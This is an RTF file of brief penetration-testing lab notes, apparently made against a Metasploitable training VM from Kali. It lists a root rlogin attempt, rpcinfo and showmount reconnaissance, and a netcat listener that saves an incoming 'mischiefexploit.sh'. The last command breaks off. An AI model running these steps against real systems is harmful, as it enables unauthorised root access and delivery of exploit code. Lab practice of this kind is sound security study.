{\rtf1\ansi\ansicpg1252\cocoartf2758
\cocoatextscaling0\cocoaplatform0{\fonttbl\f0\fmodern\fcharset0 Courier;\f1\fnil\fcharset0 HelveticaNeue;}
{\colortbl;\red255\green255\blue255;\red255\green255\blue255;\red3\green4\blue4;\red19\green19\blue19;
\red19\green19\blue19;}
{\*\expandedcolortbl;;\cssrgb\c100000\c100000\c100000;\cssrgb\c784\c1176\c1176;\cssrgb\c9804\c9804\c9804;
\cssrgb\c9804\c9804\c9804;}
\paperw11900\paperh16840\margl1440\margr1440\vieww13440\viewh8400\viewkind0
\deftab720
\pard\pardeftab720\partightenfactor0

\f0\fs28 \cf2 \cb3 \expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 rlogin -l root 192.168.99.131\
\
rpcinfo\
\
showmount -e\
\
\
\
\pard\pardeftab720\partightenfactor0

\f1\fs31\fsmilli15680 \cf4 \cb2 \strokec4 root@metasploitable:~# 
\fs31\fsmilli15680 \cf5 \cb2 \outl0\strokewidth0 nc -lvp 8080 > ~/mischiefexploit.sh\
\
dracones@kali:~$ nc 192.168.20.25<}